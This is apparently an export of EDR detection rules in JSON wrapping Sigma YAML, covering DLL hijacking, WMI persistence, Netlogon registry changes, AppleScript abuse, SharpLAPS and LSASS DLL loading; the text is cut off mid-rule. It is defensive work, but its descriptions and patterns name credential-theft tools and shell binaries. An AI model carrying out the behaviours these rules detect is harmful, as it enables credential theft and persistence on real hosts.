"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pktmon.yml",
"content": "title: DLL Hijacking via pktmon.exe\nid: 8bbb1fe2-4deb-442f-b7d5-d2e7511696ef\ndescription: |\n Detects potential Windows DLL Hijacking via pktmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pktmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mintdh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bbb1fe2-4deb-442f-b7d5-d2e7511696ef",
"rule_name": "DLL Hijacking via pktmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pktmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bc68226-f537-44e1-88e4-c54b73787047",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075808Z",
"creation_date": "2026-03-23T11:45:34.075810Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075814Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
"https://attack.mitre.org/techniques/T1546/003/"
],
"name": "t1546_003_wmi_unknown_consumer.yml",
"content": "title: Unknown WMI Consumer\nid: 8bc68226-f537-44e1-88e4-c54b73787047\ndescription: |\n Detects the creation of suspicious WMI consumer using an uncommon consumer class.\n Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\n WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\n The built-in consumers are:\n - Log File: log a message in a text file;\n - Script: execute the specified code or related script;\n - Command Line: execute the specified command line;\n - Event Log: log a message in Windows event log;\n - SMTP: send an email.\n\n It is recommended to investigate the non-standard consumer to determine its legitimacy using for example the PowerShell cmdlet Get-WmiObject.\nreferences:\n - https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html\n - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\n - https://attack.mitre.org/techniques/T1546/003/\ndate: 2023/12/07\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.WmiEvent\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: wmi_event\ndetection:\n selection:\n EventType: 'WmiConsumerEvent'\n Operation:\n - 'Created'\n - 'Modified'\n\n filter_known_types:\n Type:\n - 'Log File'\n - 'Script'\n - 'Command Line'\n - 'Event Log'\n - 'SMTP'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bc68226-f537-44e1-88e4-c54b73787047",
"rule_name": "Unknown WMI Consumer",
"rule_description": "Detects the creation of a suspicious WMI consumer using an uncommon consumer class.\nAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\nThe built-in consumers are:\n - Log File: log a message in a text file;\n - Script: execute the specified code or related script;\n - Command Line: execute the specified command line;\n - Event Log: log a message in the Windows event log;\n - SMTP: send an email.\n\nIt is recommended to investigate the non-standard consumer to determine its legitimacy, using for example the PowerShell cmdlet Get-WmiObject.\n",
"rule_creation_date": "2023-12-07",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bda48e4-7ff5-408e-8e1f-42d16a920267",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621348Z",
"creation_date": "2026-03-23T11:45:34.621350Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621355Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://support.microsoft.com/en-us/help/154501/how-to-disable-automatic-machine-account-password-changes",
"https://attack.mitre.org/techniques/T1098/"
],
"name": "t1098_disable_netlogon_password_changes.yml",
"content": "title: Automatic Machine Account Password Changes Disabled\nid: 8bda48e4-7ff5-408e-8e1f-42d16a920267\ndescription: |\n Detects when automatic Machine Account Password changes are disabled via a registry modification.\n If automatic Machine Account Password changes are disabled, there are security risks because the security channel is used for pass-through authentication. If someone discovers a password, he can potentially perform pass-through authentication to the domain controller.\n It is recommended to check the legitimacy of this action and to verify that is is a legitimate administrative action.\nreferences:\n - https://support.microsoft.com/en-us/help/154501/how-to-disable-automatic-machine-account-password-changes\n - https://attack.mitre.org/techniques/T1098/\ndate: 2020/10/19\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Netlogon\\Parameters\\DisablePasswordChange'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n exclusion_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n 
ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n ProcessImage: '?:\\Windows\\system32\\services.exe'\n\n # https://www.faronics.com/fr/products/deep-freeze\n exclusion_faronics:\n ProcessProduct: 'Deep Freeze'\n ProcessCompany: 'Faronics Corporation'\n exclusion_script:\n ProcessParentCommandLine|contains: '?:\\temp\\WS2016Optimisations.ps1'\n ProcessParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bda48e4-7ff5-408e-8e1f-42d16a920267",
"rule_name": "Automatic Machine Account Password Changes Disabled",
"rule_description": "Detects when automatic Machine Account Password changes are disabled via a registry modification.\nIf automatic Machine Account Password changes are disabled, there are security risks because the security channel is used for pass-through authentication. If someone discovers a password, they can potentially perform pass-through authentication to the domain controller.\nIt is recommended to check the legitimacy of this action and to verify that it is a legitimate administrative action.\n",
"rule_creation_date": "2020-10-19",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1098",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bf847a6-5f2e-4377-b978-8c7f5d1e7fdc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586572Z",
"creation_date": "2026-03-23T11:45:34.586576Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586584Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ldp.yml",
"content": "title: DLL Hijacking via ldp.exe\nid: 8bf847a6-5f2e-4377-b978-8c7f5d1e7fdc\ndescription: |\n Detects potential Windows DLL Hijacking via ldp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ldp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bf847a6-5f2e-4377-b978-8c7f5d1e7fdc",
"rule_name": "DLL Hijacking via ldp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ldp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c2753d6-02be-49c6-b505-e84d50ac2072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080516Z",
"creation_date": "2026-03-23T11:45:34.080518Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080523Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_curl.yml",
"content": "title: DLL Hijacking via curl.exe\nid: 8c2753d6-02be-49c6-b505-e84d50ac2072\ndescription: |\n Detects potential Windows DLL Hijacking via curl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'curl.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files (x86)\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program 
Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c2753d6-02be-49c6-b505-e84d50ac2072",
"rule_name": "DLL Hijacking via curl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via curl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c5c44a0-e263-4023-a009-e8a1f996946c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095496Z",
"creation_date": "2026-03-23T11:45:34.095498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_script_edictor_suspicious_child.yml",
"content": "title: Suspicious Program Spawned by Script Editor\nid: 8c5c44a0-e263-4023-a009-e8a1f996946c\ndescription: |\n Detects a suspicious program spawned by Script Editor.\n Script Editor is a built-in application allowing a user to create and debug Apple Script.\n Via the use of an AppleScript URL, an attacker could trick a user into executing a script encoded in the URL.\n It is recommended to investigate the spawned program to determine whether this action was legitimate.\nreferences:\n - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.AppleScript\n - classification.macOS.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ParentImage: '/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor'\n Image:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n - '/usr/bin/ruby'\n - '/usr/bin/perl'\n - '/usr/bin/curl'\n - '/usr/bin/plutil'\n - '/usr/bin/osascript'\n\n exclusion_sed:\n CommandLine|contains: \" | sed 's/<[^>]*>//g'\"\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c5c44a0-e263-4023-a009-e8a1f996946c",
"rule_name": "Suspicious Program Spawned by Script Editor",
"rule_description": "Detects a suspicious program spawned by Script Editor.\nScript Editor is a built-in application allowing a user to create and debug AppleScript.\nVia the use of an AppleScript URL, an attacker could trick a user into executing a script encoded in the URL.\nIt is recommended to investigate the spawned program to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c60ec83-9f95-4dc0-9c05-23e5df43fcd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074814Z",
"creation_date": "2026-03-23T11:45:34.074817Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074821Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/swisskyrepo/SharpLAPS",
"https://attack.mitre.org/techniques/T1555/"
],
"name": "t1555_sharplaps.yml",
"content": "title: Execution of SharpLAPS\nid: 8c60ec83-9f95-4dc0-9c05-23e5df43fcd3\ndescription: |\n Detects the execution of SharpLAPS, a tool used to retrieve LAPS passwords from the Active Directory.\n LAPS (Local Admin Password Solution) is a feature provided by Microsoft that automatically manages the password of a local administrator account of domain joined computers.\n An account with domain admin privileges or with ExtendedRight or Generic All Rights is required by the tool to query the relevant information from the Active Directory.\n It is recommended to analyze the parent process for suspicious activities as well as to look for other suspicious actions on the host.\n Authentication telemetry can be used to investigate any anomalous authentications as Administrator using stolen LAPS passwords.\nreferences:\n - https://github.com/swisskyrepo/SharpLAPS\n - https://attack.mitre.org/techniques/T1555/\ndate: 2023/03/20\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.SharpLAPS\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'SharpLAPS.exe'\n - InternalName: 'SharpLAPS.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c60ec83-9f95-4dc0-9c05-23e5df43fcd3",
"rule_name": "Execution of SharpLAPS",
"rule_description": "Detects the execution of SharpLAPS, a tool used to retrieve LAPS passwords from the Active Directory.\nLAPS (Local Admin Password Solution) is a feature provided by Microsoft that automatically manages the password of a local administrator account of domain joined computers.\nAn account with domain admin privileges or with ExtendedRight or Generic All Rights is required by the tool to query the relevant information from the Active Directory.\nIt is recommended to analyze the parent process for suspicious activities as well as to look for other suspicious actions on the host.\nAuthentication telemetry can be used to investigate any anomalous authentications as Administrator using stolen LAPS passwords.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c69841b-27a7-42ba-a3ca-190318752de4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612291Z",
"creation_date": "2026-03-23T11:45:34.612294Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612302Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_loads_dll_unknown_location.yml",
"content": "title: DLL Loaded by LSASS from Unusual Location\nid: 8c69841b-27a7-42ba-a3ca-190318752de4\ndescription: |\n Detects when a DLL is loaded by LSASS.exe from an unusual location.\n The LSASS process is responsible for authentications in Windows.\n Attackers can inject code into the LSASS process as an attempt to read credentials from its memory.\n It is recommended to analyze the loaded DLL as well as to look for signs of credential dumping on the system.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/03/28\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1055.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n ImageLoaded|startswith: '?:\\'\n\n filter_knwon_locations:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\SysWoW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\Windows\\Microsoft.NET\\'\n - '?:\\Windows\\assembly\\'\n - '?:\\Windows\\NAC\\SBS\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\WinSxS\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\SysWoW64\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\system32\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\Microsoft.NET\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\assembly\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\NAC\\SBS\\'\n - 
